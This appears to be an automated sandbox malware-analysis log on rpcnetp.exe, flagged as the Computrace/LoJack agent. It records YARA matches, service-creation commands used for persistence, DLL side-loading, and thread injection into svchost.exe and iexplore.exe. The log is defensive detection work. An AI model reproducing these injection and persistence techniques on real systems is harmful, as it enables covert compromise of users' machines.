Source: 8.0.iexplore.exe.72b20000.3.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.61.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.0.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.30.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.79.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.25.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.22.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.1.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.39.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.2.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.11.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.57.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.73.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.68.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.44.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.25.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.9.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.78.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.15.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.20.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.60.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.74.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.59.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.69.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.8.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.9.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.6.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.16.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.12.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.64.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.17.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.2.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.15.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.48.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.42.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.33.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.10.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.10.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: C:\Users\user\Desktop\rpcnetp.dll, type: DROPPEDMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: C:\Users\user\Desktop\rpcnetp.exeCode function: 6_2_00A12ADB GetCurrentProcessId,OpenProcess,DuplicateTokenEx,SetTokenInformation,CreateEnvironmentBlock,CreateProcessAsUserA,CloseHandle,CreateProcessA,WriteProcessMemory,TerminateProcess,CloseHandle,CloseHandle,ResumeThread,CreateThread,6_2_00A12ADB
Source: C:\Users\user\Desktop\rpcnetp.exeFile read: C:\Users\user\Desktop\rpcnetp.exeJump to behavior
Source: C:\Users\user\Desktop\rpcnetp.exeCode function: 6_2_00A11EDA StartServiceCtrlDispatcherA,6_2_00A11EDA
Source: C:\Users\user\Desktop\rpcnetp.exeCode function: 6_2_72B21EDA StartServiceCtrlDispatcherA,6_2_72B21EDA
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 8_2_72B21EDA StartServiceCtrlDispatcherA,8_2_72B21EDA
Source: rpcnetp.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\sc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\rpcnetp.exeCode function: 6_2_00A11EDA StartServiceCtrlDispatcherA,6_2_00A11EDA
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe' >> C:\servicereg.log 2>&1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c sc start EcVoz >> C:\servicestart.log 2>&1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc start EcVoz
Source: unknownProcess created: C:\Users\user\Desktop\rpcnetp.exe C:\Users\user\Desktop\rpcnetp.exe
Source: C:\Users\user\Desktop\rpcnetp.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc start EcVoz Jump to behavior
Source: C:\Users\user\Desktop\rpcnetp.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\iexplore.exeJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6952:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_01
Source: C:\Users\user\Desktop\rpcnetp.exeFile created: C:\Users\user\Desktop\rpcnetp.dllJump to behavior
Source: classification engineClassification label: mal72.evad.winEXE@14/5@1/1
Source: rpcnetp.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\rpcnetp.exeCode function: 6_2_00A1159C push ecx; ret 6_2_00A115AC
Source: C:\Users\user\Desktop\rpcnetp.exeCode function: 6_2_72B2159C push ecx; ret 6_2_72B215AC
Source: rpcnetp.exeStatic PE information: section name: .cdata
Source: rpcnetp.dll.6.drStatic PE information: section name: .cdata
Source: C:\Users\user\Desktop\rpcnetp.exeCode function: 6_2_00A12123 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalFree,OpenProcess,OpenProcessToken,CloseHandle,FreeLibrary,LocalFree,6_2_00A12123
Source: C:\Users\user\Desktop\rpcnetp.exeFile created: C:\Users\user\Desktop\rpcnetp.dllJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe'
Source: C:\Users\user\Desktop\rpcnetp.exeCode function: 6_2_00A11EDA StartServiceCtrlDispatcherA,6_2_00A11EDA
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\rpcnetp.exeAPI call chain: ExitProcess graph end nodegraph_6-3452
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeAPI call chain: ExitProcess graph end nodegraph_8-1679
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeAPI call chain: ExitProcess graph end nodegraph_8-2135
Source: C:\Users\user\Desktop\rpcnetp.exeCode function: 6_2_00A12123 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalFree,OpenProcess,OpenProcessToken,CloseHandle,FreeLibrary,LocalFree,6_2_00A12123

HIPS / PFW / Operating System Protection Evasion:

barindex
DLL side loading technique detected
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: C:\Users\user\Desktop\rpcnetp.dllJump to behavior
Injects files into Windows application
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeInjected file: C:\Users\user\Desktop\rpcnetp.dll was created by C:\Users\user\Desktop\rpcnetp.exeJump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\rpcnetp.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 620000Jump to behavior
Source: C:\Users\user\Desktop\rpcnetp.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 72B260C8Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: E30000Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 72B260C8Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 30F719CJump to behavior
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\rpcnetp.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 73B757B0Jump to behavior
Source: C:\Users\user\Desktop\rpcnetp.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 72B232DEJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 73B757B0Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B232DEJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B22314Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B22314Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B22314Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B22314Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B22314Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B22314Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B22314Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B22314Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B22314Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B22314Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B22314Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B22314Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B22314Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B22314Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B22314Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B22314Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B22314Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B22314Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B22314Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B22314Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B22314Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B22314Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B22314Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B22314Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B22314Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B22314Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B22314Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exeThread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B21C7BJump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeThread created: unknown EIP: 72B22314Jump to behavior
